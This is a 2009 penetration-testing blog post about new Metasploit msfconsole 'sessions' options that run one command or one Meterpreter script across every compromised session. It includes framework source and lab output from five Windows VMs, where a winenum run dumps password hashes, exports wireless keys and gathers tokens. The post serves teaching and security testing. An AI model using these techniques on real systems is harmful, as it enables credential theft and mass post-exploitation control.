penetration testing: Monday 28Dec2009 New Options in Msfconsole Sessions Command

New Options in Msfconsole Sessions Command

Monday, December 28, 2009 at 8:00AM

Metasploit recently added 2 new options to the sessions command in msfconsole. This 2 options are the ability to run commands on all open sessions and to run a Meterpreter script on all sessions that are of Meterpreter type. I consider this 2 options game changers when it comes to post exploitation since now one can run a command thru out a series of shells and be able to automate all sessions with Meterpreter at the same time.

Here is the output of the sessions command showing all options, the –c for the command execution and the –s for script execution.

msf exploit(handler) > sessions -h
Usage: sessions [options]

Active session manipulation and interaction.

OPTIONS:

   -K        Terminate all sessions.
   -c   Run a command on all live sessions
   -d   Detach an interactive session
   -h        Help banner.
   -i   Interact with the supplied session identifier.
   -k   Terminate session.
   -l        List all active sessions.
   -q        Quiet mode.
   -s   Run a script on all live meterpreter sessions
   -v        List verbose fields.

msf exploit(handler) >

Currently I have 5 session open to different systems all behind a series of firewalls that is why all sessions appear to come from a single IP.

msf exploit(handler) > sessions -l

Active sessions
===============

 Id  Description  Tunnel
 --  -----------  ------
 1   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:50441
 2   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:54920
 3   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:1396
 4   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:61686
 5   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:57197

msf exploit(handler) >

Another very useful option that was added is the –v for verbose, this lets us know if the session was the result of an exploit, what exploit or received by Multi Handler.

msf exploit(handler) > sessions -v

Active sessions
===============

 Id  Description  Tunnel                                     Via
 --  -----------  ------                                     ---
 1   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:50441  multi/handler
 2   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:54920  multi/handler
 3   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:1396   multi/handler
 4   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:61686  multi/handler
 5   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:57197  multi/handler

msf exploit(handler) >

Here is the code that is executed when the –c option is ran:

  1: cmds.each do |cmd|
  2:  framework.sessions.each_sorted do |s|
  3:   session = framework.sessions.get(s)
  4:   print_status("Running '#{cmd}' on session #{s} (#{session.tunnel_peer})")
  5:   if (session.type == "meterpreter")
  6:    c,args = cmd.split(' ', 2)
  7:    begin
  8:     process = session.sys.process.execute(c, args, {
  9:       'Channelized' => true,
 10:       'Hidden'      => true
 11:      })
 12:    rescue ::Rex::Post::Meterpreter::RequestError
 13:     print_error("Failed: #{$!.class} #{$!}")
 14:
 15:    end
 16:    print_line(process.channel.read) if process and process.channel
 17:   elsif session.type == "shell"
 18:    # Then it's a regular shell, just send the command
 19:    # to the session's stdin.
 20:    session.write_shell(cmd + "\n")
 21:    # read_shell blocks with no timeout, so we wrap
 22:    # it in a select in case there is no output
 23:    # from the command
 24:    if select([session.rstream],nil,nil,3)
 25:     output = session.read_shell
 26:     print_line(output)
 27:    end
 28:   end
 29:   # If the session isn't a meterpreter or shell type, it
 30:   # could be a VNC session (which can't run commands) or
 31:   # something custom (which we don't know how to run
 32:   # commands on), so don't bother.
 33:  end
 34: end

As it can be seen in the line 1 and 2 all commands are iterated one by one against each available session, the in likes 5 and 17 the sessions are checked to see if each one either a Meterpreter shell or a simple command Shell, this means we can write plug-ins that can automate against both types of shell using this code as example. As it can be seen in line 8 the type of command that we can run is a system command so none of the other Meterpreter commands can be used. Also on important thing to notice is that the rules for operating in a shell apply so one must be careful not to run commands that can break a shell like WMIC or certain types of SC. Lets run the hostname command on all shells:

msf exploit(handler) > sessions -c hostname
[*] Running 'hostname' on session 1 (192.168.1.138:50441)
winxplab01

[*] Running 'hostname' on session 2 (192.168.1.138:54920)
win2k3lab01

[*] Running 'hostname' on session 3 (192.168.1.138:1396)
win701

[*] Running 'hostname' on session 4 (192.168.1.138:61686)
winvis01

[*] Running 'hostname' on session 5 (192.168.1.138:57197)
WIN-YR4V852V71Y

msf exploit(handler) >

Now if we want to run commands with arguments we have to enclosed the command and the arguments in quotes, also remember that since this is ruby special characters must be escaped where it applies. For example:

msf exploit(handler) > sessions -c 'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName'
[*] Running 'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName' on session 1 (192.168.1.138:50441)

! REG.EXE VERSION 3.0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
   ProductName    REG_SZ    Microsoft Windows XP


[*] Running 'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName' on session 2 (192.168.1.138:54920)

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
   ProductName    REG_SZ    Microsoft Windows Server 2003


[*] Running 'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName' on session 3 (192.168.1.138:1396)

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
   ProductName    REG_SZ    Windows 7 Enterprise


[*] Running 'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName' on session 4 (192.168.1.138:61686)

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
   ProductName    REG_SZ    Windows Vista (TM) Enterprise


[*] Running 'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName' on session 5 (192.168.1.138:57197)

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
   ProductName    REG_SZ    Windows Server (R) 2008 Enterprise


msf exploit(handler) >

The –s option for running script is also an important one that will allow an attacker to automate several actions against a large number of sessions. Here is where I see that several steps will have to be taken when writing scripts to be used with this option, this are:

Proper logging of data will become very important do to the possibility that a large number of shells are processed.
Logs should reference the host name or host local IP of a target since many systems are now behind NAT firewalls.
Multi Threading will be of great importance since each session is handle sequentially so having Multi Threaded scripts will be a great time saver.
Scripts should at least output the hostname so the attacker can now what host he is currently running the script against.
At the moment the script must run without options.

Here is the code executed when executing this option:

  1: if (not script.nil?)
  2:  print_status("Running script #{script} on all meterpreter sessions ...")
  3:  framework.sessions.each_sorted do |s|
  4:   if ((session = framework.sessions.get(s)))
  5:    if (session.type == "meterpreter")
  6:     print_status("Session #{s} (#{session.tunnel_peer}):")
  7:     begin
  8:      client = session
  9:      client.execute_script(script, binding)
 10:     rescue ::Exception => e
 11:      log_error("Error executing script: #{e.class} #{e}")
 12:     end
 13:    end
 14:   end
 15:  end
 16: else
 17:  print_error("No script specified!")
 18: end

As it can be seen in line 5 only the sessions that are of Meterpreter type are the ones that will be interacted with.

Here is a summarized version of running winenum:

        1: msf exploit(handler) > sessions -s winenum          2: [*] Running script winenum on all meterpreter sessions ...          3: [*] Session 1 (192.168.1.138:50441):          4: [*] Running Windows Local Enumerion Meterpreter Script          5: [*] New session on 192.168.1.138:50441...          6: [*] Saving report to /home/carlos/.msf3/logs/winenum/WINXPLAB01_20091225.4410-04411/WINXPLAB01_20091225.4410-04411.txt          7: [*] Checking if WINXPLAB01 is a Virtual Machine ........          8: [*] BIOS Check Failed          9: [*]     This is a VMWare virtual Machine         10: [*] Running Command List ...         11: [*]     running command cmd.exe /c set         12: [*]     running command ipconfig /all         13: ..........         14: [*] Running WMIC Commands ....         15: [*]     running command wmic computersystem list brief         16: ..........         17: [*] Extracting software list from registry         18: [*] Dumping and Downloading the Registry entries for Configured Wireless Networks         19: [*]     Exporting HKLM\Software\Microsoft\WZCSVC\Parameters\Interfaces         20: [*]     Compressing key into cab file for faster download         21: [*]     Downloading wlan_20091225.4410-04411.cab to -> /home/carlos/.msf3/logs/winenum/WINXPLAB01_20091225.4410-04411/wlan_20091225.4410-04411.cab         22: [*]     Deleting left over files         23: [*] Dumping password hashes...         24: [*] Hashes Dumped         25: [*] Getting Tokens...         26: [*] All tokens have been processed         27: [*] Done!         28: [*] Session 2 (192.168.1.138:54920):         29: [*] Running Windows Local Enumerion Meterpreter Script         30: [*] New session on 192.168.1.138:54920...         31: [*] Saving report to /home/carlos/.msf3/logs/winenum/WIN2K3LAB01_20091225.4538-95293/WIN2K3LAB01_20091225.4538-95293.txt         32: [*] Checking if WIN2K3LAB01 is a Virtual Machine ........         33: [*]     This is a VMware Workstation/Fusion Virtual Machine         34: [*] Running Command List ...         35: [*]     running command cmd.exe /c set         36: ..........         37: [*] Running WMIC Commands ....         38: [*]     running command wmic computersystem list brief         39: ..........         40: [*] Extracting software list from registry         41: [*] Dumping password hashes...         42: [*] Hashes Dumped         43: [*] Getting Tokens...         44: [*] All tokens have been processed         45: [*] Done!         46: [*] Session 3 (192.168.1.138:1396):         47: [*] Running Windows Local Enumerion Meterpreter Script         48: [*] New session on 192.168.1.138:1396...         49: [*] Saving report to /home/carlos/.msf3/logs/winenum/WIN701_20091225.4637-88208/WIN701_20091225.4637-88208.txt         50: [*] Checking if WIN701 is a Virtual Machine ........         51: [*]     This is a VMware Workstation/Fusion Virtual Machine         52: [*] Checking if UAC is enabled ...         53: [*]     UAC is Enabled         54: [*] Running Command List ...         55: [*]     running command cmd.exe /c set         56: ..........         57: [*] Running WMIC Commands ....         58: [*]     running command wmic computersystem list brief         59: ..........         60: [*] Extracting software list from registry         61: [*] UAC is enabled, Wireless key Registry could not be dumped under current privileges         62: [-] Not currently running as SYSTEM, not able to dump hashes in Windows Vista or Windows 7 if not System.         63: [*] Getting Tokens...         64: [*] Error Getting Tokens: Rex::TimeoutError Operation timed out.         65: [*] Done!         66: [*] Session 4 (192.168.1.138:61686):         67: [*] Running Windows Local Enumerion Meterpreter Script         68: [*] New session on 192.168.1.138:61686...         69: [*] Saving report to /home/carlos/.msf3/logs/winenum/WINVIS01_20091225.4927-83932/WINVIS01_20091225.4927-83932.txt         70: [*] Checking if WINVIS01 is a Virtual Machine ........         71: [*]     This is a VMware Workstation/Fusion Virtual Machine         72: [*] Checking if UAC is enabled ...         73: [*]     UAC is Enabled         74: [*] Running Command List ...         75: [*]     running command cmd.exe /c set         76: ..........         77: [*] Running WMIC Commands ....         78: [*]     running command wmic computersystem list brief         79: ..........         80: [*] Extracting software list from registry         81: [*] UAC is enabled, Wireless key Registry could not be dumped under current privileges         82: [-] Not currently running as SYSTEM, not able to dump hashes in Windows Vista or Windows 7 if not System.         83: [*] Getting Tokens...         84: [*] All tokens have been processed         85: [*] Done!         86: [*] Session 5 (192.168.1.138:57197):         87: [*] Running Windows Local Enumerion Meterpreter Script         88: [*] New session on 192.168.1.138:57197...         89: [*] Saving report to /home/carlos/.msf3/logs/winenum/WIN-YR4V852V71Y_20091225.5019-40179/WIN-YR4V852V71Y_20091225.5019-40179.txt         90: [*] Checking if WIN-YR4V852V71Y is a Virtual Machine ........         91: [*]     This is a VMware Workstation/Fusion Virtual Machine         92: [*] Running Command List ...         93: [*]     running command cmd.exe /c set         94: ..........         95: [*] Running WMIC Commands ....         96: [*]     running command wmic computersystem list brief         97: ..........         98: [*] Extracting software list from registry         99: [-] Not currently running as SYSTEM, not able to dump hashes in Windows 2008 if not System.        100: [*] Getting Tokens...        101: [*] All tokens have been processed        102: [*] Done!        103: msf exploit(handler) >  

As it can be seen the Framework is advancing a great number of features and new options are being added. I do have to say that the path in which the HD moved the Framework when joining forces with Rapid7 is paying off in a more robust and faster release cycle.

penetration testing

jeudi 25 février 2010

Monday 28Dec2009 New Options in Msfconsole Sessions Command

New Options in Msfconsole Sessions Command

Aucun commentaire:

Enregistrer un commentaire